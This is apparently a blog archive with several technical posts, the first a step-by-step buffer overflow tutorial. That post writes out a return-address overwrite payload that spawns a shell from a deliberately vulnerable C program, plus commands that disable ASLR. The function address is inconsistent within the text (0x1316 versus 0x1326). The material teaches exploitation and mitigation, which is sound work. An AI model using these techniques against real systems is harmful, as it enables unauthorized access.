
Understanding Buffer Overrun Exploits

Introduction

Buffer overrun exploits (also known as buffer overflow attacks) are one of the most well-known and dangerous types of vulnerabilities in software security. These exploits take advantage of how a program manages memory—specifically, by writing more data to a buffer (an allocated block of memory) than it can safely hold. When this happens, the excess data can overwrite adjacent memory locations, potentially altering the program’s control flow or causing it to behave unpredictably.

Attackers can exploit buffer overruns to inject malicious code or manipulate the system to execute arbitrary instructions, often gaining unauthorized access to the target system. Despite being a well-studied vulnerability, buffer overflows remain relevant today, particularly in low-level languages like C and C++, which allow direct memory manipulation.

In this post, we’ll take a closer look at buffer overrun exploits, how they work, and explore some real-world code examples in C that demonstrate this vulnerability. By understanding the mechanics behind buffer overflows, we can also better understand how to mitigate them.

Disclaimer: The code in this article is purely for demonstration purposes. We use some intentionally unsafe techniques to set up an exploitable scenario. DO NOT use this code in production applications, ever.

Password Validator Example

In the following example, the program will ask for input from the user and validate it against a password stored on the server.

void do_super_admin_things() {
  system("/bin/sh");
}

int main(int argc, char *argv[]) {
  if (validate_password()) {
    do_super_admin_things();
  } else {
    printf("ERROR: Bad password\n");
  }

  return 0;
}

do_super_admin_things is our privileged target. Here it spawns a shell, but it could be any sensitive functionality. The point is that this program is trying to control access to that function by making sure you have the password first!

The validate_password function is responsible for getting that password in from the outside world. It prompts, then reads from stdin. Note the use of gets().

int validate_password() {
  char password_attempt[64];

  printf("What is the password? ");
  gets(password_attempt);

  return check_password(password_attempt);
}

Warning About gets

The usage of gets() here is highly frowned upon because of how insecure it is. Below are notes from the man page for it:

BUGS Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead.

The Library Functions Manual makes it clear. It’s such a horrible function security-wise that it was deprecated in the C99 standard (as per §7.26.13) and removed entirely in C11:

The gets function is obsolescent, and is deprecated.

If there’s one thing to learn from this section, it’s don’t use gets().

To get this code to compile, I had to relax some of the standard rules and mute certain warnings:

gcc vuln1.c -m32 -std=c89 -Wno-deprecated-declarations -fno-stack-protector -g -o vuln1 

Checking the Password

The check_password function reads a file from disk that contains the super-secret password, then compares the attempt to the correct password.

int check_password(char *attempt) {
  char password[256];
  int fd = 0;

  if ((fd = open("./the-password", O_RDONLY)) < 0) {
    perror("open");
    return 0;
  }

  ssize_t read_bytes = read(fd, password, 256);
  
  if (password[read_bytes - 1] == 0xa) {
    password[read_bytes - 1] = 0x0;
  }

  close(fd);

  return strncmp(password, attempt, strlen(password)) == 0;
}

Crashes

Initially, if you provide any normal input, the program behaves as expected:

What is the password? AAAAAAAAAAAA
ERROR: Bad password

But if you push the input a bit further, exceeding the bounds of the password_attempt buffer, you can trigger a crash:

What is the password? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[1]    60406 segmentation fault (core dumped)  ./vuln1
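
Rather than mashing the A key, you can generate the oversized input with a quick Python one-liner (the length of 300 is arbitrary; anything comfortably past the 64-byte buffer will do):

python3 -c 'print("A" * 300)' | ./vuln1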

The program crashes due to a segmentation fault. Checking dmesg gives us more information:

$ dmesg | tail -n 5
[ 4442.984159] vuln1[60406]: segfault at 41414141 ip 0000000041414141 sp 00000000ff9a5670 error 14 likely on CPU 19 (core 35, socket 0)
[ 4442.984189] Code: Unable to access opcode bytes at 0x41414117.

Notice the 41414141 pattern. This is significant because it shows that the capital A’s from our input (0x41 in hexadecimal) are making their way into the instruction pointer (ip). The input we provided has overflowed into crucial parts of the stack, including the instruction pointer.

You can verify that 0x41 represents ‘A’ by running the following command:

echo -e "\x41\x41\x41\x41"
AAAA

Controlling the Instruction Pointer

This works because the large input string is overflowing the password_attempt buffer. This buffer is a local variable in the validate_password function, and in the stack, local variables are stored just below the return address. When password_attempt overflows, the excess data overwrites the return address on the stack. Once overwritten, we control what address the CPU will jump to after validate_password finishes.

Maybe we could find the address of the do_super_admin_things function and simply jump directly to it. In order to do this, we need to find that address. Only the name of the function is available to us in the source code, and the address of the function is determined at compile time, so we need to lean on some other tools to gather this intel.

By using objdump we can take a look inside of the compiled executable and get this information.

objdump -d vuln1

This disassembles the vuln1 program and gives us the location of each of the functions. We search for the function that we want (do_super_admin_things):

00001316 <do_super_admin_things>:
    1316:       55                      push   %ebp
    1317:       89 e5                   mov    %esp,%ebp
    1319:       53                      push   %ebx

We find that it’s at address 00001316. We need to take note of this value as we’ll need it shortly.

Now we need to find exactly where, in that big group of A’s we’re sending as input, the saved return address sits, so we can land our own address on the stack. We’ve already got some inside knowledge about our buffer: it’s 64 bytes in length.

We need a marker in the input so we can determine where our address needs to go. We can do that with some well-known payload data. We re-run the program with our 64 A’s, but this time add a recognizable pattern of characters afterwards:

What is the password? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFF
[1]    60406 segmentation fault (core dumped)  ./vuln1

This segfaults again, but this time the BBBBCCCCDDDDEEEEFFFF pattern follows the 64 A’s. Looking at the log in dmesg now:

[ 9287.917223] vuln1[62745]: segfault at 45454545 ip 0000000045454545 sp 00000000ffa63b50 error 14 likely on CPU 18 (core 34, socket 0)

The 45454545 tells us which part of the input ends up as the return address. \x45 corresponds to the E’s:

echo -e "\x45\x45\x45\x45"
EEEE

That means that our instruction pointer will start at the E’s.

Prepare the Payload

To make life easier, we’ll write a Python script that generates this payload for us. Note that it uses the function address we found earlier.

#!/usr/bin/python
import sys

# fill out the original buffer
payload =  b"A" * 64
# extra pad to skip to where we want our instruction pointer 
payload += b"BBBBCCCCDDDD"
# address of our function "do_super_admin_things"
payload += b"\x16\x13\x00\x00"

sys.stdout.buffer.write(payload)
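
The address bytes are written least-significant byte first because x86 is little-endian. If you’d rather not hand-encode them, Python’s struct module can pack the value for you (a quick check using the 0x1316 offset we pulled from objdump):

import struct

addr = 0x1316  # address of do_super_admin_things from objdump
print(struct.pack("<I", addr))  # b'\x16\x13\x00\x00' - 4 bytes, little-endian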

We can now inject this into the execution of our binary and achieve a shell:

$ (python3 payload.py; cat) | ./vuln1 

ls
input  payload.py  the-password  vuln1	vuln1.c

We use (python3 payload.py; cat) here because of how the shell handles file descriptors. If we simply piped the script’s output, stdin would be closed as soon as the script finished and our newly spawned shell would exit immediately. Keeping cat in the pipeline holds stdin open so we can type commands into the shell.

Static vs. Runtime Addresses

When we run our program normally, modern operating systems apply Address Space Layout Randomization (ASLR), which shifts memory locations randomly each time the program starts. ASLR is a security feature that makes it more challenging for exploits to rely on hardcoded memory addresses, because the memory layout changes every time the program is loaded.

For example, if we inspect the runtime address of do_super_admin_things in GDB, we might see something like:

(gdb) info address do_super_admin_things
Symbol "do_super_admin_things" is at 0x56556326 in a file compiled without debugging.

This differs from the objdump address 0x1326, as it’s been shifted by the base address of the executable (e.g., 0x56555000 in this case). This discrepancy is due to ASLR.
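
You can sanity-check that relationship yourself; the runtime address is just the load base plus the static offset:

>>> hex(0x56555000 + 0x1326)
'0x56556326'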

Temporarily Disabling ASLR for Demonstration

To ensure the addresses in objdump match those at runtime, we can temporarily disable ASLR. This makes the program load at consistent addresses, which is useful for demonstration and testing purposes.

To disable ASLR on Linux, run:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

This command disables ASLR system-wide. Be sure to re-enable ASLR after testing by setting the value back to 2:

echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

Conclusion

In this post, we explored the mechanics of buffer overflow exploits, walked through a real-world example in C, and demonstrated how ASLR impacts the addresses used in an exploit. By leveraging objdump, we could inspect static addresses, but we also noted how runtime address randomization, through ASLR, makes these addresses unpredictable.

Disabling ASLR temporarily allowed us to match objdump addresses to those at runtime, making the exploit demonstration clearer. However, this feature highlights why modern systems adopt ASLR: by shifting memory locations each time a program runs, ASLR makes it significantly more difficult for attackers to execute hardcoded exploits reliably.

Understanding and practicing secure coding, such as avoiding vulnerable functions like gets() and implementing stack protections, is crucial in preventing such exploits. Combined with ASLR and other modern defenses, these practices create a layered approach to security, significantly enhancing the resilience of software.

Buffer overflows remain a classic but essential area of study in software security. By thoroughly understanding their mechanisms and challenges, developers and security researchers can better protect systems from these types of attacks.

Setup Unattended Updates for Debian

Introduction

Keeping your Linux servers up to date with the latest security patches is critical. Fortunately, if you’re running a Debian-based distribution (like Debian or Ubuntu), you can easily automate this process using unattended-upgrades. In this guide, we’ll walk through setting up automatic patching with unattended-upgrades, configuring a schedule for automatic reboots after updates, and setting up msmtp to send email notifications from your local Unix mail account.

Installation

The first step is to install unattended-upgrades, which will automatically install security (and optionally other) updates on your server. Here’s how to do it:

sudo apt-get update
sudo apt-get install unattended-upgrades apt-listchanges

After installation, you’ll want to enable unattended-upgrades:

sudo dpkg-reconfigure --priority=low unattended-upgrades

This will configure your server to automatically install security updates. However, you can customize the configuration to also include regular updates if you prefer.

Configuration

By default, unattended-upgrades runs daily, but you can configure it further by adjusting the automatic reboot settings to ensure that your server reboots after installing updates when necessary.

Automatic Updates

Edit the unattended-upgrades configuration file:

sudo vim /etc/apt/apt.conf.d/50unattended-upgrades

Make sure the file has the following settings to apply both security and regular updates:

Unattended-Upgrade::Allowed-Origins {
    "${distro_id}:${distro_codename}-security";
    "${distro_id}:${distro_codename}-updates";
};

Automatic Reboots

You can also configure the server to automatically reboot after installing updates (useful when kernel updates require a reboot). To do this, add or modify the following lines in the same file:

Unattended-Upgrade::Automatic-Reboot "true";
Unattended-Upgrade::Automatic-Reboot-Time "02:00";

Testing and Dry Runs

To give this a quick test, you can use the following:

# dry run the process
sudo unattended-upgrade --dry-run --verbose

# run the unattended upgrade immediately
sudo unattended-upgrade --verbose

Email Notification

In the same file, you can simply add the email address that you’d like to notify:

Unattended-Upgrade::Mail "your-local-username@localhost";

You may need to configure your Debian machine to be able to send email. For this, we’ll use msmtp, which can relay mail through an external SMTP provider. I use Gmail, but you can use any provider.

Configuration

Open up the /etc/msmtprc file. For the password here, I needed to use an “App Password” from Google (specifically).

defaults
tls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
logfile /var/log/msmtp.log

account gmail
host smtp.gmail.com
port 587
auth on
user your-email@gmail.com
password your-password
from your-email@gmail.com

account default : gmail

Default

You can set msmtp as your default by linking it as sendmail.

sudo ln -sf /usr/bin/msmtp /usr/sbin/sendmail

Testing

Make sure your setup for email is working now by sending yourself a test message:

echo "Test email from msmtp" | msmtp your-local-username@localhost

Conclusion

With unattended-upgrades and msmtp configured, your Debian-based servers will automatically stay up to date with security and software patches, and you’ll receive email notifications whenever updates are applied. Automating patch management is crucial for maintaining the security and stability of your servers, and these simple tools make it easy to manage updates with minimal effort.

Happy patching!

Exploring Advanced Word Embeddings

Introduction

In our previous posts, we explored traditional text representation techniques like One-Hot Encoding, Bag-of-Words, and TF-IDF, and we introduced static word embeddings like Word2Vec and GloVe. While these techniques are powerful, they have limitations, especially when it comes to capturing the context of words.

In this post, we’ll explore more advanced topics that push the boundaries of NLP:

  • Contextual Word Embeddings like ELMo, BERT, and GPT
  • Dimensionality Reduction techniques for visualizing embeddings
  • Applications of Word Embeddings in real-world tasks
  • Training Custom Word Embeddings on your own data

Let’s dive in!

Contextual Word Embeddings

Traditional embeddings like Word2Vec and GloVe generate a single fixed vector for each word. This means the word “bank” will have the same vector whether it refers to a “river bank” or a “financial institution,” which is a major limitation in understanding nuanced meanings in context.

Contextual embeddings, on the other hand, generate different vectors for the same word depending on its context. These models are based on deep learning architectures and have revolutionized NLP by capturing the dynamic nature of language.

ELMo (Embeddings from Language Models)

ELMo was one of the first models to introduce the idea of context-dependent word representations. Instead of a fixed vector, ELMo generates a vector for each word that depends on the entire sentence. It uses bidirectional LSTMs to achieve this, looking both forward and backward in the text to understand the context.

BERT (Bidirectional Encoder Representations from Transformers)

BERT takes contextual embeddings to the next level using the Transformer architecture. Unlike traditional models, which process text in one direction (left-to-right or right-to-left), BERT is bidirectional, meaning it looks at all the words before and after a given word to understand its meaning. BERT also uses pretraining and fine-tuning, making it one of the most versatile models in NLP.

GPT (Generative Pretrained Transformer)

While GPT is similar to BERT in using the Transformer architecture, it is primarily unidirectional and excels at generating text. This model has been the backbone for many state-of-the-art systems in tasks like text generation, summarization, and dialogue systems.

Why Contextual Embeddings Matter

Contextual embeddings are critical in modern NLP applications, such as:

  • Named Entity Recognition (NER): Contextual models help disambiguate words with multiple meanings.
  • Machine Translation: These embeddings capture the nuances of language, making translations more accurate.
  • Question-Answering: Systems like GPT-3 excel in understanding and responding to complex queries by leveraging context.

To experiment with BERT, you can try the transformers library from Hugging Face:

from transformers import BertTokenizer, BertModel

# Load pre-trained model tokenizer
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')

# Tokenize input text
text = "NLP is amazing!"
encoded_input = tokenizer(text, return_tensors='pt')

# Load pre-trained BERT model
model = BertModel.from_pretrained('bert-base-uncased')

# Get word embeddings from BERT
output = model(**encoded_input)
print(output.last_hidden_state)

The tensor output from this process should look something like this:

tensor([[[ 0.0762,  0.0177,  0.0297,  ..., -0.2109,  0.2140,  0.3130],
         [ 0.1237, -1.0247,  0.6718,  ..., -0.3978,  0.9643,  0.7842],
         [-0.2696, -0.3281,  0.3901,  ..., -0.4611, -0.3425,  0.2534],
         ...,
         [ 0.2051,  0.2455, -0.1299,  ..., -0.3859,  0.1110, -0.4565],
         [-0.0241, -0.7068, -0.4130,  ...,  0.9138,  0.3254, -0.5250],
         [ 0.7112,  0.0574, -0.2164,  ...,  0.2193, -0.7162, -0.1466]]],
    grad_fn=<NativeLayerNormBackward0>)

Visualizing Word Embeddings

Word embeddings are usually represented as high-dimensional vectors (e.g., 300 dimensions for Word2Vec). While this is great for models, it’s difficult for humans to interpret these vectors directly. This is where dimensionality reduction techniques like PCA and t-SNE come in handy.

Principal Component Analysis (PCA)

PCA reduces the dimensions of the word vectors while preserving the most important information. It helps us visualize clusters of similar words in a lower-dimensional space (e.g., 2D or 3D).

Following on from the previous example, we’ll use the simple embeddings that we’ve generated in the output variable.

from sklearn.decomposition import PCA
import matplotlib.pyplot as plt

# . . .

embeddings = output.last_hidden_state.detach().numpy()

# Reduce embeddings dimensionality with PCA
# The embeddings are 3D (1, sequence_length, hidden_size), so we drop the batch dimension first
embeddings_2d = embeddings[0]  # Remove the batch dimension, now (sequence_length, hidden_size)

# Apply PCA
pca = PCA(n_components=2)
reduced_embeddings = pca.fit_transform(embeddings_2d)

# Visualize the first two principal components of each token's embedding
plt.figure(figsize=(8,6))
plt.scatter(reduced_embeddings[:, 0], reduced_embeddings[:, 1])

# Add labels for each token
tokens = tokenizer.convert_ids_to_tokens(encoded_input['input_ids'][0])
for i, token in enumerate(tokens):
    plt.annotate(token, (reduced_embeddings[i, 0], reduced_embeddings[i, 1]))

plt.title('PCA of BERT Token Embeddings')
plt.xlabel('Principal Component 1')
plt.ylabel('Principal Component 2')
plt.savefig('bert_token_embeddings_pca.png', format='png')

You should see a plot similar to this:

BERT Token Embeddings PCA

This is a scatter plot where the 768 dimensions of each embedding have been reduced to 2 principal components using Principal Component Analysis (PCA). This allows us to plot the tokens in two-dimensional space.

Some observations when looking at this chart:

Special Tokens [CLS] and [SEP]

These special tokens are essential in BERT. The [CLS] token is typically used as a summary representation for the entire sentence (especially in classification tasks), and the [SEP] token is used to separate sentences or indicate the end of a sentence.

In the plot, you can see [CLS] and [SEP] are far apart from other tokens, especially [SEP], which has a distinct position in the vector space. This makes sense since their roles are unique compared to actual word tokens like “amazing” or “is.”

Subword Tokens

Notice the token labeled ##p. This represents a subword. BERT uses a WordPiece tokenization algorithm, which breaks rare or complex words into subword units. In this case, “NLP” has been split into nl and ##p because BERT doesn’t have “NLP” as a whole word in its vocabulary. The fact that nl and ##p are close together in the plot indicates that BERT keeps semantically related parts of the same word close in the vector space.
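
You can see the WordPiece split directly by asking the tokenizer for its tokens. This is a small check using the tokenizer we loaded earlier; the exact split depends on the model’s vocabulary:

print(tokenizer.tokenize("NLP is amazing!"))
# e.g. ['nl', '##p', 'is', 'amazing', '!'] with bert-base-uncased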

Contextual Similarity

The tokens “amazing” and “is” are relatively close to each other, which reflects that they are part of the same sentence and share a contextual relationship. Interestingly, “amazing” is a bit more isolated, which could be because it’s a more distinctive word with a strong meaning, whereas “is” is a more common auxiliary verb and closer to other less distinctive tokens.

Distribution and Separation

The distance between tokens shows how BERT separates different tokens in the vector space based on their contextual meaning. For example, [SEP] is far from the other tokens because it serves a very different role in the sentence. The overall spread of the tokens suggests that BERT embeddings can clearly distinguish between different word types (subwords, regular words, and special tokens).

t-SNE (t-Distributed Stochastic Neighbor Embedding)

t-SNE is another popular technique for visualizing high-dimensional data. It captures both local and global structures of the embeddings and is often used to visualize word clusters based on their semantic similarity.

I’ve continued on from the code that we’ve been using:

from sklearn.manifold import TSNE
import matplotlib.pyplot as plt

embeddings = output.last_hidden_state.detach().numpy()[0]

# use TSNE here
tsne = TSNE(n_components=2, random_state=42, perplexity=1)
reduced_embeddings = tsne.fit_transform(embeddings)

# Plot the t-SNE reduced embeddings
plt.figure(figsize=(8, 6))
plt.scatter(reduced_embeddings[:, 0], reduced_embeddings[:, 1])

# Add labels for each token
for i, token in enumerate(tokens):
    plt.annotate(token, (reduced_embeddings[i, 0], reduced_embeddings[i, 1]))

plt.title('t-SNE of BERT Token Embeddings')
plt.xlabel('Dimension 1')
plt.ylabel('Dimension 2')

# Save the plot to a file
plt.savefig('bert_token_embeddings_tsne.png', format='png')

The output of which looks a little different to PCA:

BERT Token Embeddings tSNE

The embeddings are distributed quite differently in comparison: t-SNE emphasizes local neighbourhoods rather than the directions of maximum variance that PCA picks out.

Real-World Applications of Word Embeddings

Word embeddings are foundational in numerous NLP applications:

  • Semantic Search: Embeddings allow search engines to find documents based on meaning rather than exact keyword matches.
  • Sentiment Analysis: Embeddings can capture the sentiment of text, enabling models to predict whether a review is positive or negative.
  • Machine Translation: By representing words from different languages in the same space, embeddings improve the accuracy of machine translation systems.
  • Question-Answering Systems: Modern systems like GPT-3 use embeddings to understand and respond to natural language queries.

Example: Semantic Search with Word Embeddings

In a semantic search engine, user queries and documents are both represented as vectors in the same embedding space. By calculating the cosine similarity between these vectors, we can retrieve documents that are semantically related to the query.

import numpy as np
from sklearn.metrics.pairwise import cosine_similarity

# Simulate a query embedding (1D vector of size 768, similar to BERT output)
query_embedding = np.random.rand(1, 768)  # Shape: (1, 768)

# Simulate a set of 5 document embeddings (5 documents, each with a 768-dimensional vector)
document_embeddings = np.random.rand(5, 768)  # Shape: (5, 768)

# Compute cosine similarity between the query and the documents
similarities = cosine_similarity(query_embedding, document_embeddings)  # Shape: (1, 5)

# Rank documents by similarity (higher similarity first)
ranked_indices = similarities.argsort()[0][::-1]  # Sort in descending order
print("Ranked document indices (most similar to least similar):", ranked_indices)

# If you want to print the similarity scores as well
print("Similarity scores:", similarities[0][ranked_indices])

Walking through this code:

query_embedding and document_embeddings

  • We generate random vectors to simulate the embeddings. In a real use case, these would come from an embedding model (e.g., BERT, Word2Vec). The query_embedding represents the vector for the user’s query, and document_embeddings represents vectors for a set of documents.

  • Both query_embedding and document_embeddings must have the same dimensionality (e.g., 768 if you’re using BERT).

Cosine Similarity

  • The cosine_similarity() function computes the cosine similarity between the query_embedding and each document embedding.
  • Cosine similarity measures the cosine of the angle between two vectors, which ranges from -1 (completely dissimilar) to 1 (completely similar). In this case, we’re interested in documents that are most similar to the query (values close to 1).
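
For reference, the quantity being computed for each query/document pair is:

\[ \text{cosine\_similarity}(\mathbf{q}, \mathbf{d}) = \frac{\mathbf{q} \cdot \mathbf{d}}{\lVert \mathbf{q} \rVert \, \lVert \mathbf{d} \rVert} \]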

Ranking the Documents

  • We use argsort() to get the indices of the document embeddings sorted in ascending order of similarity.
  • The [::-1] reverses this order so that the most similar documents appear first.
  • The ranked_indices gives the document indices, ranked from most similar to least similar to the query.

The output of which looks like this:

Ranked document indices (most similar to least similar): [3 4 1 2 0]
Similarity scores: [0.76979867 0.7686247  0.75195574 0.74263041 0.72975817]

Training Your Own Word Embeddings

While pretrained embeddings like Word2Vec and BERT are incredibly powerful, sometimes you need embeddings that are fine-tuned to your specific domain or dataset. You can train your own embeddings using frameworks like Gensim for Word2Vec or PyTorch for more complex models.

The following code shows training Word2Vec with Gensim:

from gensim.models import Word2Vec
import nltk
from nltk.tokenize import word_tokenize

nltk.download('punkt_tab')

# Example sentences
sentences = [
    word_tokenize("I love NLP"),
    word_tokenize("NLP is amazing"),
    word_tokenize("Word embeddings are cool")
]

# Train Word2Vec model
model = Word2Vec(sentences, vector_size=100, window=5, min_count=1, workers=4)
# Get vector for a word
vector = model.wv['NLP']
print(vector)

The output here is a 100-dimensional vector that represents the word NLP.

[-5.3622725e-04  2.3643136e-04  5.1033497e-03  9.0092728e-03
 -9.3029495e-03 -7.1168090e-03  6.4588725e-03  8.9729885e-03
 
  . . . . . .

  . . . . . . 

 3.4736372e-03  2.1777749e-04  9.6188262e-03  5.0606038e-03 
 -8.9173904e-03 -7.0415605e-03  9.0145587e-04  6.3925339e-03]

Fine-Tuning BERT with PyTorch

You can also fine-tune BERT or other transformer models on your own dataset. This is useful when you need embeddings that are tailored to a specific domain, such as medical or legal text.
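
As a rough illustration of what that looks like with the Hugging Face transformers library, here is a minimal fine-tuning sketch for a sentiment-style classification task. The tiny in-line dataset, label scheme, and hyperparameters are all placeholders; a real fine-tune would use a proper dataset, batching, and evaluation.

import torch
from transformers import BertTokenizer, BertForSequenceClassification

tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertForSequenceClassification.from_pretrained('bert-base-uncased', num_labels=2)

# Placeholder dataset: two sentences with binary sentiment labels
texts = ["I love NLP", "This model is terrible"]
labels = torch.tensor([1, 0])

encoded = tokenizer(texts, padding=True, truncation=True, return_tensors='pt')
optimizer = torch.optim.AdamW(model.parameters(), lr=2e-5)

model.train()
for epoch in range(3):
    optimizer.zero_grad()
    outputs = model(**encoded, labels=labels)  # passing labels makes the model return a loss
    outputs.loss.backward()
    optimizer.step()
    print(f"epoch {epoch}: loss = {outputs.loss.item():.4f}")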

Conclusion

Word embeddings have come a long way, from static models like Word2Vec and GloVe to dynamic, context-aware models like BERT and GPT. These techniques have revolutionized how we represent and process language in NLP. Alongside dimensionality reduction for visualization, applications such as semantic search, sentiment analysis, and custom embeddings training open up a world of possibilities.

Double Buffering with Windows GDI in MASM

Introduction

In a previous post, I detailed a double-buffering implementation written in C. The idea behind double buffering is to draw graphics off-screen, then quickly swap (or “flip”) this off-screen buffer with the visible screen. This technique reduces flickering and provides smoother rendering. While the C implementation was relatively straightforward using GDI functions, I decided to challenge myself by recreating it in assembly language using MASM32.

There are some slight differences that I’ll go through.

The full code is available as a gist to follow along with.

Macros

First up, this module defines some macros that are just helpful blocks of reusable code.

  • szText defines a string inline
  • m2m performs a value assignment from one memory location to another
  • return is a simple analog for the return keyword in C
  • rgb encodes 8-bit RGB components into the eax register (producing a COLORREF-style 0x00BBGGRR value)

; Defines strings in an ad-hoc fashion
szText MACRO Name, Text:VARARG
    LOCAL lbl
    jmp lbl
    Name db Text,0
lbl:
ENDM

; Assigns a value from a memory location into another memory location
m2m MACRO M1, M2
    push M2
    pop M1
ENDM

; Syntax sugar for returning from a PROC
return MACRO arg
    mov eax, arg
    ret
ENDM

rgb MACRO r, g, b
    xor eax, eax
    mov ah, b
    mov al, g
    rol eax, 8
    mov al, r
ENDM

Setup

The setup is very much like its C counterpart with a registration of a class first, and then the creation of the window.

szText szClassName, "DoubleBufferClass"

mov wc.cbSize, sizeof WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW or CS_BYTEALIGNWINDOW
mov wc.lpfnWndProc, offset WndProc
mov wc.cbClsExtra, NULL
mov wc.cbWndExtra, NULL
m2m wc.hInstance, hInst
mov wc.hbrBackground, NULL
mov wc.lpszMenuName, NULL
mov wc.lpszClassName, offset szClassName

invoke LoadIcon, NULL, IDI_APPLICATION
mov wc.hIcon, eax

invoke LoadCursor, NULL, IDC_ARROW
mov wc.hCursor, eax

mov wc.hIconSm, 0

invoke RegisterClassEx, ADDR wc

The szClassName gives us a reference to the name of the class to use.

invoke CreateWindowEx, WS_EX_APPWINDOW, ADDR szClassName, ADDR szDisplayName, WS_OVERLAPPEDWINDOW,
                       CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, hInst, NULL

Message pump

We continue to render out to the window in a loop:

StillRunning:
    invoke PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE

    cmp eax, 0
    je RenderFrame

    invoke DispatchMessage, ADDR msg

RenderFrame:

    invoke DrawRandomShape
    invoke InvalidateRect, hWnd, NULL, 0

    cmp bRunning, 1
    je StillRunning

Using InvalidateRect tells the window that there is an update to draw. This is then propagated through the WM_PAINT message.

Window proc

Each of the window messages is handled in a switch/case like arrangement with a series of cmp and je instructions.

In higher level MASM this can be handled using the .IF syntax.

    cmp uMsg, WM_CREATE
    je CreateMessage

    cmp uMsg, WM_DESTROY
    je DestroyMessage

    cmp uMsg, WM_ERASEBKGND
    je EraseBackgroundMessage

    cmp uMsg, WM_CLOSE
    je CloseMessage

    cmp uMsg, WM_SIZE
    je SizeMessage

    cmp uMsg, WM_PAINT
    je PaintMessage

    jmp DefaultWindowHandler

We use the WM_CREATE, WM_SIZE, and WM_DESTROY messages to control when we create and destroy our back buffer.

CreateMessage:
SizeMessage:
    invoke RecreateBackBuffer, hWin
    jmp DefaultWindowHandler

DestroyMessage:

    invoke DestroyBackBuffer, hWin
    invoke PostQuitMessage, 0

    xor eax, eax
    ret

WM_PAINT only needs to worry about drawing the backbuffer to the window.

PaintMessage:
    invoke FlipBackBuffer, hWin
    mov eax, 1
    ret

Handling the buffer

The routine that handles the back buffer construction is called RecreateBackBuffer. It’s a routine that cleans up before it tries to create the back buffer, saving the program from memory leaks:

    invoke DestroyBackBuffer, hWin
    
    invoke GetClientRect, hWin, ADDR clientRect
    invoke GetDC, hWin
    mov winDC, eax

    invoke CreateCompatibleDC, winDC
    mov memDC, eax

    mov eax, clientRect.right
    sub eax, clientRect.left
    mov ebx, clientRect.bottom
    sub ebx, clientRect.top

    invoke CreateCompatibleBitmap, winDC, eax, ebx
    mov memBitmap, eax
    invoke SelectObject, memDC, memBitmap
    mov memOldBitmap, eax
    xor eax, eax

DestroyBackBuffer is the first thing called here; it’s just a basic cleanup:

    cmp memDC, NULL
    je MemoryDCDeallocated

    invoke SelectObject, memDC, memOldBitmap
    invoke DeleteObject, memBitmap
    invoke DeleteDC, memDC

    mov memDC, NULL
    mov memOldBitmap, NULL
    mov memBitmap, NULL

MemoryDCDeallocated:

    cmp winDC, NULL
    je WindowDCReleased

    invoke ReleaseDC, hWin, winDC
    mov winDC, NULL

WindowDCReleased:

    xor eax, eax
    ret

Flipping

When we want to draw that back buffer to the window, we just use BitBlt from the GDI:

    LOCAL hDC:HDC
    LOCAL ps:PAINTSTRUCT

    invoke BeginPaint, hWin, ADDR ps
    mov hDC, eax

    mov eax, clientRect.right
    sub eax, clientRect.left
    mov ebx, clientRect.bottom
    sub ebx, clientRect.top

    invoke BitBlt, hDC, 0, 0, eax, ebx, memDC, 0, 0, SRCCOPY
    invoke EndPaint, hWin, ADDR ps

    xor eax, eax
    ret

Conclusion

This is just a different take on the same application written in C. Some of the control structures in assembly language can seem a little hard to follow, but there is something elegant about their simplicity.

Data Structures, Algorithms, and Complexity

Introduction

In this post, we’ll walk through fundamental data structures and sorting algorithms, using Python to demonstrate key concepts and code implementations. We’ll also discuss the algorithmic complexity of various operations like searching, inserting, and deleting, as well as the best, average, and worst-case complexities of popular sorting algorithms.

Algorithmic Complexity

When working with data structures and algorithms, it’s crucial to consider how efficiently they perform under different conditions. This is where algorithmic complexity comes into play. It helps us measure how the time or space an algorithm uses grows as the input size increases.

Time Complexity

Time complexity refers to the amount of time an algorithm takes to complete, usually expressed as a function of the size of the input, \(n\). We typically use Big-O notation to describe the worst-case scenario. The goal is to approximate how the time increases as the input size grows.

Common Time Complexities:

  • \(O(1)\) (Constant Time): The runtime does not depend on the size of the input. For example, accessing an element in an array by index takes the same amount of time regardless of the array’s size.
  • \(O(n)\) (Linear Time): The runtime grows proportionally with the size of the input. For example, searching for an element in an unsorted list takes \(O(n)\) time because, in the worst case, you have to check each element.
  • \(O(n^2)\) (Quadratic Time): The runtime grows quadratically with the input size. Sorting algorithms like Bubble Sort and Selection Sort exhibit \(O(n^2)\) time complexity because they involve nested loops.
  • \(O(\log n)\) (Logarithmic Time): The runtime grows logarithmically as the input size increases, often seen in algorithms that reduce the problem size with each step, like binary search (see the sketch after this list).
  • \(O(n \log n)\): This complexity appears in efficient sorting algorithms like Merge Sort and Quick Sort, combining the linear and logarithmic growth patterns.
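
To make the logarithmic case concrete, here is a small binary search over a sorted Python list; each iteration halves the remaining search space, so the number of comparisons grows as \(O(\log n)\):

def binary_search(arr, target):
    low, high = 0, len(arr) - 1
    while low <= high:
        mid = (low + high) // 2
        if arr[mid] == target:
            return mid          # found the target at index mid
        elif arr[mid] < target:
            low = mid + 1       # discard the lower half
        else:
            high = mid - 1      # discard the upper half
    return -1                   # target is not present

print(binary_search([1, 3, 5, 7, 9, 11], 7))  # 3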

Space Complexity

